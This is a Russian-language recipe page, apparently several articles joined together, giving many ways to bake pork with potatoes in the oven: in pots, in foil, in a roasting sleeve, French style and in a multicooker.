3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Свинина с картофелем в духовке

10 рецептов свинины с картошкой в духовке, которые оценит любая хозяйка

Простые и сытные блюда с сыром, помидорами, шампиньонами и не только.

1. Свинина с картошкой, луком и майонезом в духовке

Ингредиенты

  • 1 кг картошки;
  • 600–700 г свинины (рёбрышек или мякоти);
  • 2–3 луковицы;
  • 4–5 столовых ложек майонеза;
  • соль и перец — по вкусу;
  • 1 столовая ложка растительного масла;
  • 100 г твёрдого сыра.

Приготовление

Картофель и мясо нарежьте небольшими кусочками, лук — полукольцами. Смешайте всё с майонезом, посолите и поперчите.

Выложите в форму для запекания, смазанную маслом. Готовьте 40–45 минут в духовке при температуре 180 °С. Перед подачей посыпьте тёртым сыром и оставьте на 5 минут при комнатной температуре.

Попробуйте

2. Свинина с картошкой и луком под соусом бешамель

Ингредиенты

  • 5 крупных картофелин;
  • 2 луковицы;
  • 150 г твёрдого сыра;
  • 650–700 г свиной вырезки;
  • 1 столовая ложка растительного масла;
  • 3 столовые ложки сливочного масла;
  • 3 столовые ложки муки;
  • 2 чайные ложки соли;
  • ½ чайной ложки молотого чёрного перца;
  • ½ чайной ложки сушёного тимьяна;
  • ½ чайной ложки сушёного шалфея;
  • 750 мл молока.

Приготовление

Картофель нарежьте тонкими ломтиками, лук — полукольцами. Сыр натрите на крупной тёрке.

Вырезку нарежьте ломтиками толщиной примерно 0,5 см. Обжарьте на растительном масле по минуте‑две с каждой стороны.

В глубокой сковороде растопите сливочное масло на небольшом огне. Соедините с мукой, солью, перцем, тимьяном и шалфеем. Постепенно вливайте молоко и постоянно помешивайте, чтобы не осталось комков. Снимите с огня и перемешайте с картошкой и луком.

В форму для запекания выложите свинину. Сверху — картофельно‑луковую смесь. Накройте фольгой и выпекайте 30 минут при температуре 180 °C. Уберите фольгу, перемешайте и оставьте ещё на 30 минут. За 5–10 минут до готовности посыпьте сыром.

Наслаждайтесь

3. Свинина с картошкой, сливками и розмарином в духовке

Ингредиенты

  • 1 кг картофеля;
  • 1 кг мякоти свинины;
  • 4 луковицы;
  • 2 зубчика чеснока;
  • 1–2 столовые ложки растительного масла;
  • ½ чайной ложки сахара;
  • 1 столовая ложка сливочного масла;
  • соль и перец — по вкусу;
  • 1 чайная ложка розмарина;
  • 420 мл куриного бульона или воды;
  • 120 мл жирных сливок.

Приготовление

Картофель и свинину нарежьте небольшими кусочками, лук — кольцами или полукольцами. Чеснок измельчите или пропустите через пресс.

В сковороде разогрейте растительное масло на среднем огне. За 2–3 минуты обжарьте свинину и выложите на тарелку. В той же сковороде подрумяньте лук с сахаром за 3–5 минут.

Дно формы для запекания смажьте размягчённым сливочным маслом. Выложите половину картофеля, весь лук, посолите и поперчите. Добавьте свинину, соль, перец, розмарин и чеснок. Сверху поместите оставшийся картофель. Залейте бульоном, смешанным со сливками. Накройте фольгой. Выпекайте 30 минут при температуре 200 °C. После снимите фольгу и готовьте ещё примерно столько же.

Оцените вкус

4. Свинина с картошкой, сыром и сливками «по‑французски»

Ингредиенты

  • 350–400 г мякоти свинины;
  • 3–4 крупные картофелины;
  • 1 луковица;
  • 200 г твёрдого сыра;
  • 1 столовая ложка растительного масла;
  • соль и перец — по вкусу;
  • 150–200 мл сливок;

Приготовление

Свинину нарежьте тонкими пластами, картофель — тонкими ломтиками, лук — полукольцами. Сыр натрите на крупной тёрке.

Форму для выпечки смажьте маслом. Поместите в неё мясо и лук, посолите и поперчите. Сверху положите картофель, добавьте ещё немного соли и перца, залейте сливками и посыпьте сыром. Накройте фольгой.

Выпекайте в духовке при температуре 180 °C примерно 50–60 минут. За 5 минут до готовности уберите фольгу.

Сохраните рецепты

5. Свинина с картошкой и кукурузой в фольге

Ингредиенты

  • 400 г мякоти свинины;
  • 5–6 картофелин;
  • 1 морковь;
  • 2 луковицы;
  • 1 початок кукурузы (можно заменить на 100–150 г замороженных зёрен);
  • 2 столовые ложки растительного масла;
  • соль и перец — по вкусу;
  • любые специи — опционально.

Приготовление

Свинину разрежьте на четыре одинаковых ломтика, картофель нарежьте средними кусочками, морковь и лук — небольшими. Початок кукурузы разделите на несколько частей, если используете замороженные зёрна — оттайте.

Возьмите четыре куска фольги. На каждый налейте немного масла. Все подготовленные ингредиенты разделите на четыре одинаковые части и выложите на листы фольги. Посолите и поперчите, добавьте специи. Заверните фольгу так, чтобы внутри оставалось небольшое свободное пространство. Выложите на противень. Запекайте в духовке при температуре 180 °С примерно 40–50 минут.

Угощайтесь

6. Свинина с картошкой, луком и чесноком в духовке

Ингредиенты

  • 3–4 крупные картофелины;
  • соль — по вкусу;
  • 1 столовая ложка сливочного масла;
  • 100–120 мл молока;
  • 2 моркови;
  • 1–2 зубчика чеснока;
  • 3–4 веточки петрушки;
  • 1 луковица;
  • 1 столовая ложка растительного масла;
  • 450 г свиного фарша;
  • перец — по вкусу;
  • 240 мл говяжьего бульона или воды;
  • 2 столовые ложки муки.

Приготовление

Картофель отварите до готовности в подсоленной воде примерно за 20 минут. Измельчите толкушкой со сливочным маслом и молоком, чтобы получилось пюре.

Морковь натрите на крупной тёрке. Чеснок измельчите или пропустите через пресс. Зелень нарубите.

Лук нарежьте небольшими кусочками. За 2–3 минуты обжарьте в растительном масле на среднем огне. Смешайте с фаршем и чесноком. Готовьте ещё 3–5 минут. Посолите, поперчите, залейте бульоном, посыпьте мукой и петрушкой. Постоянно помешивая, оставьте на плите на 6–8 минут.

Готовый фарш выложите в форму для запекания. Добавьте морковь, сверху покройте картофельным пюре. Накройте фольгой и запекайте 30–35 минут при температуре 200 °С. За 10–15 минут до готовности снимите фольгу.

Побалуйте семью

7. Свинина с картошкой и сметанно‑горчичным соусом

Ингредиенты

  • 650–700 г небольшого картофеля;
  • 400–500 г мякоти свинины;
  • 1 чайная ложка паприки;
  • 1 чайная ложка сушёного орегано;
  • ½ чайной ложки молотого чили;
  • ½ чайной ложки измельчённого сушёного лука;
  • ½ чайной ложки чесночного порошка;
  • ½ чайной ложки молотого чёрного перца;
  • ¼ чайной ложки соли;
  • 60–70 мл сметаны;
  • 2 столовые ложки дижонской горчицы;
  • 1 столовая ложка растительного масла.

Приготовление

Картофель отварите до готовности примерно за 20–25 минут. После выложите на тарелку.

Свинину разрежьте на 4–5 плоских кусочков. В небольшой миске смешайте паприку, орегано, чили, лук, чесночный порошок, половину чёрного перца и соль. Отдельно соедините сметану с горчицей и оставшимся перцем.

Противень застелите фольгой и смажьте маслом. Выложите мясо, рядом поместите картофель и разомните его обратной стороной ложки. Посыпьте смесью специй. Выпекайте примерно 20–25 минут при температуре 200 °С. Перед подачей полейте сметанно‑горчичным соусом и оставьте при комнатной температуре на 3–5 минут.

Сделайте без повода

8. Свинина с картошкой, шампиньонами и томатным соусом в духовке

Ингредиенты

  • 600 г мякоти свинины;
  • 4–6 крупных картофелин;
  • 5–6 крупных шампиньонов;
  • 1 луковица;
  • 100 г моцареллы;
  • 1 столовая ложка растительного масла;
  • соль и перец — по вкусу;
  • 700 мл томатного соуса.

Приготовление

Мясо нарежьте пластами толщиной примерно в половину сантиметра, картофель — крупными кусочками, грибы — средними, лук — полукольцами. Сыр натрите на крупной тёрке.

Форму для запекания смажьте маслом. Выложите свинину, лук, грибы и картофель. Посолите и поперчите. Залейте соусом и плотно закройте фольгой.

Запекайте 45 минут при температуре 180 °С. После уберите фольгу, посыпьте сыром и готовьте ещё 15 минут. Перед подачей оставьте на 5 минут при комнатной температуре.

Поэкспериментируйте

9. Свинина с картошкой и сыром в горшочках

Ингредиенты

  • 600 г картофеля;
  • 400–500 г мякоти свинины;
  • 100 г твёрдого сыра;
  • 1 морковь;
  • 1 луковица;
  • 40 г сливочного масла;
  • 150 мл молока или воды;
  • соль и перец — по вкусу.

Приготовление

Картофель и свинину нарежьте небольшими кусочками. Сыр и морковь натрите на крупной тёрке. Лук измельчите.

На дно горшочков выложите мясо, сверху картофель, масло, лук и морковь. Залейте молоком, смешанным с солью и перцем. Накройте крышкой, поставьте в духовку и готовьте 50–60 минут при температуре 200 °С. После посыпьте сыром, не закрывайте крышку и оставьте запекаться ещё на 10–15 минут.

Добавьте в закладки

10. Свинина с картошкой, помидорами и сыром в духовке

Ингредиенты

  • 6 картофелин;
  • 5–6 небольших помидоров;
  • 4 столовые ложки сливочного масла;
  • 150–200 г моцареллы или другого сыра;
  • 1 луковица;
  • 1–2 зубчика чеснока;
  • 3–5 веточек петрушки или другой зелени;
  • 1½ чайной ложки растительного масла;
  • 450 г свиного фарша;
  • соль и перец — по вкусу;
  • любые специи для мяса — опционально;
  • 3 столовые ложки сливок жирностью 10–18%.

Приготовление

Картофель и помидоры нарежьте тонкими ломтиками, сливочное масло — небольшими кусочками. Сыр натрите на средней тёрке. Лук измельчите, чеснок пропустите через пресс. Зелень нарубите.

В сковороде разогрейте 1 чайную ложку растительного масла на среднем огне. За 2–3 минуты обжарьте лук. Добавьте фарш и готовьте ещё 4–5 минут, постоянно помешивайте. Посолите, поперчите, посыпьте специями и чесноком, залейте сливками. Перемешайте.

Форму для запекания смажьте оставшимся растительным маслом. Выложите слой картофеля с солью и перцем, сверху — фарш с кусочками сливочного масла, после — помидоры. Посыпьте сыром. Накройте фольгой и поставьте в духовку, разогретую до 200 °С. Выпекайте 35–40 минут, после снимите фольгу и готовьте ещё 3–5 минут.

Свинина с картошкой в духовке — Простые и вкусные рецепты

Свинина с картошкой, запеченная в духовке, так же как мясо по-французски очень часто готовится в качестве основного блюда как для праздничного стола, так и для домашнего застолья. Большой плюс в его приготовлении то, что продукты, входящие в состав этого блюда не требует какой либо длительной подготовки, и несмотря на его простую технологию, оно получается очень вкусным, ароматным и сочным.

Для готовки лучше всего брать ошеек с небольшими прожилками жира, либо поясничную часть или вырезку, потому что это самая нежная часть свиной туши. А если решили покупать в магазине, то необходимо обратить особое внимание на цвет и фактуру самого мяса, а от этого и будет зависеть его вкус и основные свойства. Так что учитывайте то, что чем темнее цвет мяса, тем оно старше, и будет более жестким.

В сегодняшней статье, я Вам дорогой читатель расскажу, как запечь вкусную свинину с картошкой в духовке, на которую уйдет, совсем немного времени. Так же предлагаю оценить прошлые рецепты домашних пельменей.

Свинина с картошкой запеченная в горшочке

Ингредиенты:

  • Картофель — 1 кг
  • свинина — 800 гр
  • лук репчатый — 2 шт
  • сметана — 2 ст. л
  • вода — 1/2 стакана
  • соль и молотый перец по вкусу.

Способ приготовления:

Первым делом подготавливаем необходимые продукты. Затем промываем мясо, режем его на средние кусочки и перекладываем в подготовленный горшочек.

Далее очищаем лук, шинкуем его небольшими кусочками и добавляем к мясу.

Картофель чистим, нарезаем кубиком и спускаем к остальным ингредиентам в горшочек.

Всыпаем молотый перец, соль по вкусу, добавляем сметану, слегка ее распределяем по верху и вливаем пол стакана чистой воды.

Теперь закрываем крышечкой и отправляем горшочек в духовку, выставляем температуру 180 градусов, и готовим в течении одного часа. По истечении времени духовую печь выключаем и оставляем в ней наше блюдо томиться, еще минут на 30.

Ни в коем случае не ставим глиняный горшочек в уже разогретую духовку, так как он может лопнуть.

После чего достаем и подаем к столу. Попробуйте приготовить и Вы для своих родных и близких, я уверен, им очень понравится!

Свинина с картошкой на противне — пошаговый рецепт

Ингредиенты:

  • Свинина — 1 кг
  • картофель — 1 кг
  • грибы маринованные шампиньоны — 200 гр
  • лук репчатый — 1 шт
  • сыр твердый — 100 гр
  • соль и черный перец по вкусу.

Способ приготовления:

Мясо промываем, а затем режем небольшим кубиком и выкладываем на противень.

Лук шинкуем небольшими кусочками и раскладываем поверх мяса. Солим и перчим по вкусу.

Далее соломкой нарезаем картофель, выкладываем его сверху и немного подсаливаем.

Теперь открываем баночку консервированных грибов, сливаем всю жидкость, выкладываем на картошку и смазываем по всей поверхности слоем майонеза.

Осталось только сверху посыпать натертым на крупной терке сыром и отправить в разогретую до 220 градусов духовку на 50-60 минут.

Готовое блюдо достаем и подаем к столу порционно.

Вкусное мясо с картофелем в рукаве

Ингредиенты:

  • Мясо — 600 гр
  • картофель — 900 гр
  • лук репчатый — 2 средние шт
  • морковь — 1 крупная шт
  • масло подсолнечное — 30 гр
  • горчица — 1 ч. л
  • горчица зернистая — 2 ч. л
  • малиновый уксус — 1 ст. л
  • майоран сушеный — 1 ст. л
  • соль и молотый черный перец по вкусу.

Способ приготовления:

Свинину промываем, срезаем пленку, жилы, режем средними кусочками и помещаем в миску.

Далее очищаем, затем нарезаем полукольцами лук и перекладываем его к мясу. Сюда же добавляем соль, молотый перец по вкусу, два вида горчицы, малиновый уксус, (если такого нет- можно использовать лимонный сок), хорошо перемешиваем и оставляем мариноваться на 20 минут .

Тем временем нарезаем средними кубиками картофель и полукольцами морковь. Соединяем их в глубокой миске, присыпаем сушеным майораном, слегка солью с молотым черным перцем и заливаем подсолнечным маслом. После чего тщательно перемешиваем.

После того, как мясо замариновалось, соединяем его с приправленными овощами, перемешиваем и перекладываем в рукав для запекания.

Теперь, когда пакет полностью заполнен, завязываем его, выкладываем на противень либо удобную форму, сверху проделываем с помощью зубочистки 3-5 проколов и отправляем в разогретую до 180 градусов духовку на 40-50 минут запекаться.

Блюдо получается очень вкусным, сытным и ароматным.

Рецепт приготовления в фольге

Ингредиенты:

  • Мякоть свинины — 400 гр
  • картофель — 5 шт
  • лук репчатый — 2 средние шт
  • сметана 20% — 5 ст. л
  • майонез домашний — 3 ст. л
  • чеснок сушеный — 1 ч. л
  • масло растительное — 1 ст. л
  • соль, перец и специи по вкусу.

Способ приготовления:

1. Нарезаем свиное мясо на три равные части, так же как на отбивные, отбиваем специальным молоточком и присыпаем солью, перцем, и любимыми специями.

2. Картофель и лук очищаем и нарезаем кружочками, толщиной примерно 5 мм.

3. Фольгу складываем в два слоя, смазываем ее растительным маслом и выкладываем на нее три кружочка лука.

4. Сверху на лук кладем один кусок отбивного, обильно смазываем его домашним майонезом и сметаной.

5. Затем поверх выкладываем кружочки картофеля, присыпаем солью, перцем, сушеным чесноком и немного смазываем сметаной.

6. Теперь аккуратно сворачиваем фольгу к верху, но только так, чтобы она не соприкасалась с картошкой.

7. Точно так же подготавливаем еще две порции и отправляем в разогретую до 180 градусов духовку на 30 минут, после чего приоткрываем фольгу сверху и доводим до готовности еще в течении 15-20 минут.

8. Готовое блюдо подаем к столу горячим.

Простой рецепт свинины с картошкой в сметане (видео)

Картошечка с мясом в сметане — это очень вкусное и питательное блюдо на каждый день. Готовится оно достаточно просто, убедитесь друзья в этом сами!

Вкусная свинина с картошкой в духовке — простые рецепты приготовления

Добрый день! На сегодня наш основной продукт это свинина. Если уметь ее готовить, то выходит всегда вкусно. Сегодня вам расскажу несколько рецептов, как ее приготовить, чтобы было аппетитно и приятно подавать на стол.

Говорить о том что свинина очень полезна лишнее так как, все знают что она богата цинком и железом. Этот продукт полезен для кормящих женщин, так как содержит огромное количество белка. Не забываем про наши сосуды и сердце, свинина стабилизирует их функционирование.

Содержание:

Будем надеяться, что эти рецепты вам не покажутся сложными. Так же, что все продукты имеются у вас в холодильнике. Главное помнить, питаться нужно правильно и в меру!

Вкусная свинина с картошкой, запечённая в духовке в рукаве

Для приготовления вкусного обеда или срочного ужина перед гостями, многого не требуется, на такие случаи, есть простой рецепт свинины с картошкой, приготовленной в рукаве.

Практически у всех на кухне имеется:

  • килограмм картошки
  • две морковки
  • майорана ложка
  • грамм тридцать масла растительного
  • свинина шестьсот грамм
  • 150 грамм лук репка
  • 2 типа горчицы: обычной чайная ложка и зернистая две
  • малиновый уксус
  • соль и перец каждый добавит по своему вкусу.

1. Начнем готовить наш кулинарный шедевр на скорую руку, итак, для начала возьмем свинину, хорошо промываем ее, после чего обсушим бумажным полотенцем. Нарезаем небольшими кусочками, для приготовления подойдет вырезка свинины или с небольшим слоем сала. Во втором случае оно получится более жирным.

2. Чистим лук, режем его полукольцами, кладем это все в чашку к мясу. Далее солим, перчим по вкусу, добавляем всю горчицу и поливаем малиновым уксусом, хорошенько все перемешиваем. Даем промариноваться тридцать минут.

3. Пока маринуется мясо, очищаем картошку, порежем кусочками некрупными, к ней добавляем нарезанную полукольцами морковку. Добавляем специи с подсолнечным маслом, также их перемешиваем.

4. Смешиваем картофель с мясом вместе. После, кладем все это дело в рукав, ровняем по горизонтали, завязываем края и укладываем на противень или большую форму. Ставим в духовой шкаф на 40-60 минут, температура должна быть 180 градусов. Блюдо выйдет сочным и вкусным.

Как приготовить свинина с картошкой в фольге

Наше следующее блюдо тоже достаточно легко приготовить, основные ингредиенты все те же — картошка и свинина.

Понадобиться:

  • Мясо, грамм шестьсот
  • Картофель, его нам нужен килограмм
  • Зеленый лук — два пучка
  • Подсолнечное масло
  • Из специй возьмем паприку, тмин, соль и молотый перец
  • Сыра грамм двести

1. Начнем с картофеля, промываем, чистим, нарезаем средними кусочками, откладываем в сторону для сушки.

2. Переходим к мясу, промываем, срезаем жир, если кто-то любит пожирнее то его можно оставить. Нарезаем не очень большими кусочками, обсушиваем, кладем в чашку, посыпаем солью, перцем и тмином с паприкой. Все перемешиваем, чтобы мясо пропиталось.

3. Наступает момент выкладки на противень, в него кладем фольгу, оставляем немного по краям, чтобы можно было завернуть её вовнутрь. Выкладываем мясо с картошкой по всей поверхности противня ровным слоем.

Вы можете делать раскладку, как полностью на весь противень, так и порционно. Порционный получается красивей.

4. Берем два пучка лука, мелко нарезаем его. Лук высыпаем к мясу с картошкой, тщательно мешаем. После добавляем сто грамм масла и снова перемешиваем.

5. Духовку мы разогреваем до 180-190 градусов. Пока духовка греется, у нас есть время, чтобы завернуть края фольги, прижимая их к картошке. Отправляем в печь. Процесс запекания длится полтора или два часа, но для верности блюдо стоит проверить через час его нахождения в духовке. Мясо должно пропечься, картофель стать рыхлым. Если такого нет, то заверните и продолжайте запекать.

6. За пять минут до готовности, разверните, посыпьте сыром. Блюдо подается сразу на стол. Корочки на нем не будет, но если переставить его под конец в верх печи, при этом, желательно использовать режим «гриль» и увеличивая температуру, можно добиться аппетитной корочки.
Блюдо можно подать с различными соусами, можно украсить зеленью.

Готовим свинину с картошкой в противне в духовке

Наверное самое простое что можно приготовить из свинины, это запечь ее с картошкой на противне.

Нужно:

  • свинина полкилограмма
  • шесть картофелин
  • твердый сыр сто пятьдесят грамм
  • лук репка две штучки
  • сметана или майонез
  • перец и соль

1. Подготавливаем мясо, его моем, нарезаем тонкими пластами, хорошо будет использовать филе или филейную вырезку. Такое мясо будет вкусным, сочным и достаточно быстро приготовится.
Отбиваем мясо через пищевую пленку, либо через пакет.

2. Укладываем на противень, оставляя расстояние между кусками полсантиметра-сантиметр. Мясо солим и перчим по своему вкусу.

3. Добавляем лук, его режем тонкими кольцами, укладываем сверху на мясо. Далее каждый кусок мяса обмазываем майонезом или сметаной.

4. Следующее, картошка. Моем, нарезаем, стараемся сделать это как можно тоньше. Посыпаем специями и поливаем соусом который выбрали. Перемешиваем картошку. Выкладываем ее слоями на кусочки мяса.

5. Берем сыр и среднюю терку. Трём, посыпаем картошку. Печь разогреваем до 180 градусов, отправляем внутрь противень, оставляем на 35 минут.
Блюдо готово, подавайте к столу и приятного Вам аппетита!

Рецепт свинины с картошкой, грибами, горошком в горшочке

Свинина такой продукт, что его можно готовить как угодно и выйдет все равно вкусно!
Поэтому, сейчас распишем рецепт этого чудо продукта с картошкой и зеленым горошком.
Подача блюда будет в горшочке. Количество ингредиентов может быть любым, главное помнить, что картошки должно быть больше в два раза, чем мяса.

А нужны нам:

  • Все та же свинина 600 грамм и картошка килограмм, это основа яства
  • Пара головок лука
  • Майонез по вкусу
  • Специи по вкусу
  • Растительное масло
  • Немного грибочков, грамм 200
  • Зеленый горошек

1. Начинаем! Разогреваем сковороду, при этом наливая туда немного масла. Режем лук полукольцами, закидываем половину в сковородку. Грибы режем и отправляем на жарку следом, как только они выделят воду, солим и перчим. Ставим на слабый огонь и пятнадцать минут тушим, не забываем помешивать.

2. Мясо нарезаем небольшими ломтями, обсушиваем. После нарезки свинины, берем шесть ложек масла, лук, жарим две-три минуты. Переводим на средний огонь, кладем мясо и готовим десять минут. Помним, что надо посолить и поперчить!

3. Картошку, чистим, режем соломкой. На сковороду, где готовили мясо, выкладываем картошку, жарим минут десять, пока не покроется корочкой.


4. Греем духовку до 170 градусов, примерно. Достаем горшочки наливаем туда пару ложек воды. Следом кладем картошку, подсаливаем. Следом идут мясо с луком. Потом грибы с луком.
Заканчиваем сметаной или майонезом. Между слоями посыпаем горошек. Отправляем в духовку на час и ждем вкуснейшего блюда, не забудьте проверять блюдо, пока оно в духовке. Вот и все, блюдо готово, гости сыты и приятно удивлены подачей. Приятного аппетита!

Свинина по-французски с картошкой в духовке

На этот раз удивим гостей “заграничным мяском”. А именно мясо по-французски!

Для его приготовления нам нужно:

  • Наши любимые ингредиенты — свинина грамм 600 и картошка килограмм
  • Также головка лука
  • Два помидора
  • Сыра двести грамм
  • Майонез 150 грамм
  • Немного специй

1. Берем картофель, нарезаем пластами. Достаем противень, выкладываем на него бумагу для выпечки, сверху накладываем картофель, не забывая перчить и солить, смазываем майонезом.

2. Обмываем свинину, нарезаем тонкими кусочками, отбиваем со всех сторон. После кладем свинину поверх картошки, добавляем специи. Смазываем все это дело майонезом.

3. Лук чистим, нарезаем его кольцами, выкладываем на картофель, следом таким же образом режем помидоры и сверху на лук. Помидоры солим, мажем майонезом.


4. Греем духовку до двухсот градусов, отправляем противень в печь. Сорок или сорок пять минут и наше блюдо почти готово.

6. Отключаем печь и достаем противень. Обильно трем сыр на лист, снова отправляем в духовку. Ждем пока сыр расплавится. Пять минут и готово. Сытный ужин можно подавать к столу, приятного аппетита.

Как приготовить свинину с картошкой в мультиварке

Наше последнее творение это, картошка со свининой в мультиварке. Этот чудо-помощник, практически, ничем не отличается от печи, так же варит и жарит. Отличие только в том что на печке вы сами выбираете температуру при которой хотите готовить, а мультиварка сама знает, какой нужен градус для блюда, а вкус вы можете сравнить сами. Приступаем!

Что нам понадобится:

  • Свиной гуляш полкило
  • Полтора килограмма картошки
  • Две головки лука
  • Три зубца чеснока
  • Немного томатной пасты
  • Две морковки
  • Масло и специи

1. Берем лук, промываем, режем кубиками, старайтесь нарезать как можно тоньше. Дальше идем за морковкой, ее так же моем и нарезаем. Картофель чистим, повторяем с ним все то же что и с морковью. С приготовлением овощей закончили.

2. Мясо, его особо резать не надо, если вы, конечно, все таки выбрали нарезку «гуляш». Если выбрали мясо одним куском, то нарежьте как вам удобно.

3. Приступаем к мультиварке, ее мы ставим в режим жарки, наливаем туда масла, ждем пока оно прогреется. Следом кладем в чашу мясо и минут пятнадцать нам хватит, чтобы оно обжарилось.

4. Добавляем лук, морковь, продлеваем режим на десять минут. После можно добавлять специи на ваше усмотрение и перемешать. Так же после специй добавляем пасту, чеснок и так же перемешиваем.

5. Самое последнее, картошка. Кладем в чашу, перемешиваем вместе со всем. Ставим мультиварку в режим тушение, время на час. За ней не придется следить, так как она выключится автоматически и в скором времени получаем вкусный обед. Приятного аппетита!

Видео рецепт приготовления запечённой свиной шеи с картофелем

Вот такие, совсем не сложные рецепты мы сегодня с Вами перебрали. Надеемся, что у вас получились, вместе со мной, вкусные обеды и ужины. Гости были удивлены вашими кулинарными способностями, вы услышали похвалы, а возможно и аплодисменты. Но самое главное, что вы получили удовольствие от процесса и вкуса!

Свинина в духовке с картошкой — самые лучшие рецепты

Свинину с картошкой в духовке можно готовить хоть в будни, хоть в праздники — это несомненный плюс блюд. Вкусное сочное мясо быстро запекается, великолепно сочетается с массой иных продуктов. Встреча с картофелем делает блюдо более сытным, достойным хоть в пир, хоть в мир. В духовом шкафу кушанье запекают в горшочках, рукаве, фольге или просто на противне. Добавляют грибы, традиционные лук с морковкой, делают под сырной шубкой, с помидорами, сметаной, майонезом.

Сегодня мы познакомимся с основными вариантами приготовления вкусных блюд. Запечем свинину большим куском, нарезанной на порции. Все рецепты проверены неоднократно большим количеством едоков – домочадцами и гостями. Одобрены, и получили высший балл!

Свинина с картошкой и овощами в духовке – рецепт (пошагово)

Быстро и легко! Помимо предложенных в рецепте овощей можно брать баклажаны, цветную капусту, стручковую фасоль.

  • Молодые кабачки – 2-3 маленьких размеров.
  • Свиная вырезка – 600 гр.
  • Картошка – 4 клубня.
  • Крупная морковка.
  • Луковица.
  • Болгарский перец.
  • Чеснок – пара зубчиков.
  • Соль, перец, подсолнечное масло.

По желанию можно плеснуть немного соевого соуса и добавить любые приправы, но в классическом исполнении рецепт самый простой.

Можно делать произвольную нарезку овощей, но лучше примерно одинаковыми кубиками и кольцами. Поделите кабачки кубиками среднего размера. Если овощ молочной спелости, семенную часть допустимо оставить.

Нарежьте полукольцами луковицу.

Настрогайте морковку колечками.

Картофель сделайте соразмерными кабачкам кубиками.

У сладкого перца удалите семена с перегородками, покрошите короткой соломкой.

Мясо нарежьте брусочками.

Сложите все компоненты в форму для запекания (можно в рукав). Плесните масла, посыпьте приправами на свой вкус. Руками перемешайте содержимое.

Отправьте в духовую печь на 50-60 минут. Разброс во времени объясняется индивидуальными особенностями вашей духовки. Температура запекания 190-200 о С. форму можно прикрыть фольгой, тогда блюдо получится намного сочнее.

Свинина с картошкой по–французски в духовке

Любое мясо, запеченное по-французски вкусно само по себе. Добавление картошки сделает блюдо полноценным, уже с гарниром. Предлагаю наиболее простой вариант.

  • Вырезка свинины – 700 гр.
  • Картошка – килограмм.
  • Сыр – 150 гр.
  • Бульон – ½ стакана.
  • Лук – парочка.
  • Сливочное масло – 100 гр.
  • Сметана – 5 больших ложек.
  • Майонез – столько же.
  • Чесночные зубчики – 2 шт.
  • Приправы для свинины, перец, соль.
  1. Помойте, обсушите кусок свинины. Нарежьте стейками толщиной в сантиметр.
  2. Спрячьте куски под пищевую пленку, старательно отбейте молоточком.
  3. Щедро посыпьте приправами, не забыв про соль с перцем. Распределите по всей поверхности и слегка вотрите в мясо.
  4. Накройте миску с заготовками, оставьте на четверть часа мариноваться.
  5. Параллельно нашинкуйте лук колечками.
  6. Почистите клубни картофеля, нарежьте кружочками (крупные картофелины делите полукружьями). Посолите и поперчите нарезку, перемешайте.
  7. В отдельной плошке соедините майонез со сметаной. Добавьте туда раздавленный прессом чеснок.
  8. Нарежьте кусочками сливочное масло, разложите по донышку формы для запекания мяса.
  9. Поверх, на некотором расстоянии друг от друга, выложите отбивные. Поверх уложите луковые колечки.
  10. Накройте картофельными кружочками. Полейте сверху соусом. Постарайтесь, чтобы соус покрыл картошку полностью.
  11. Советую на дно формы налить немного бульона, тогда мясо получится намного сочнее.
  12. Запеките блюдо при 180 о С. Время приготовления 30 минут.
  13. Затем достаньте форму, посыпьте каждый кусочек тертым сыром.
  14. Верните в печь, продолжайте запекать еще полчаса. Сигналом о готовности станет красивая корочка.

Как вкусно запечь свинину в рукаве (пакете) целым куском

Великолепное блюдо для ужина или угощения друзей. Свинина, запеченная в рукаве, гарантированно будет очень сочной. Рецепт очень напоминает приготовление буженины, только делается уже с гарниром.

На запекание большим куском берите ошеек, окорок, вырезку из задней части поросенка. Желательно, чтобы у мякоти была небольшая жировая прослойка, выйдет вкуснее. Как еще можно приготовить вырезку поросенка, узнайте на другой страничке, я с удовольствием делюсь рецептами.

  • Мякоть свинины – 1 кг.
  • Картофель – 1 кг.
  • Крупная луковица.
  • Зубчики чеснока – 4 шт.
  • Готовая горчица – 2 маленькие ложки.
  • Кориандр, тимьян, перец, лавровый лист, соль, паприка.
  1. Ополосните кусок вырезки. Натрите смесью тимьяна с кориандром, разломанным на мелкие кусочки лавровым листом, солью. Можете добавить в маринад немного перца.
  2. Поверх специй свинину нужно обмазать со всех сторон горчицей. Аккуратно заверните кусок в пищевую пленку, поместите на полку холодильника.
  3. Оставьте минимум на 6 часов. Чем крупнее кусок мяса, тем больше понадобится времени для маринования. Вырезку около 2 килограммов маринуют до 10-12 часов, этот момент учитывайте.
  4. Поделите дольки чеснока на 2-4 части. Лук разрежьте аналогично, на крупные части.
  5. Нарежьте очищенный картофель крупными кружочками.
  6. Переложите маринованное мясо в пакет для запекания, обложите его картофельной нарезкой. Между ними расположите чеснок с луком. Если решите сдобрить блюдо какими-либо приправами от себя — самое время.
  7. Готовьте мясо при 180 о С. Настройте таймер на 45-50 минут.
  8. По сигналу таймера достаньте противень, разрежьте рукав. Увеличьте температуру в духовке до 200 о С. Верните блюдо в печь для дополнительного запекания. Примерно через 10-15 минут появится очень красивая румяная корочка. Это сигнал о готовности блюда. Не торопитесь сразу доставать кушанье из духовки, дайте постоять при закрытой дверце еще минут 10.

Свинина в горшочках, запеченная с картошкой

Рецепт предназначен для праздничной подачи, под сырной корочкой мясо станет ароматным, сочным.

  • Картошка – 4 клубня.
  • Свиная вырезка – 300 гр.
  • Луковка.
  • Морковь.
  • Твёрдый сыр – около 100 гр.
  • Майонез, соль, прованские травки, перец.
  1. Овощи можно нарезать произвольной формы и размеров, чтобы удобнее было кушать.
  2. Свинину поделите кусочками, но большими по размеру, чем нарезка картошки.
  3. Выложите компоненты слоями, начиная с картошки. Последовательность не имеет значения. Каждый слой чуть смажьте майонезным соусом.
  4. Добавьте специи, посолите.
  5. Доверху залейте кипятком, отправьте в духовку. Температура в духовом шкафу – 200 о С. Время приготовления – один час. Минут за 15 до окончания присыпьте верх блюда тертым сыром.

Жаркое из свинины – домашний рецепт

Самое лакомое блюдо из любимых продуктов. Не в кастрюле, а именно в духовке. Медленно томленая картошка со свиным мясом, потрясающе вкусна! По желанию можно добавить грибы, коренья петрушки. На приготовление берите кусок с небольшим добавлением жирка.

  • Мясо – 600 гр.
  • Картофель – 600 гр.
  • Морковка.
  • Луковица.
  • Подсолнечное масло, перец, соль.
  • По желанию можно добавить чеснок.
  1. Мясо станет намного вкуснее, если нарезать его кусочками, а затем обжарить на сильном огне до красивого румяного цвета.
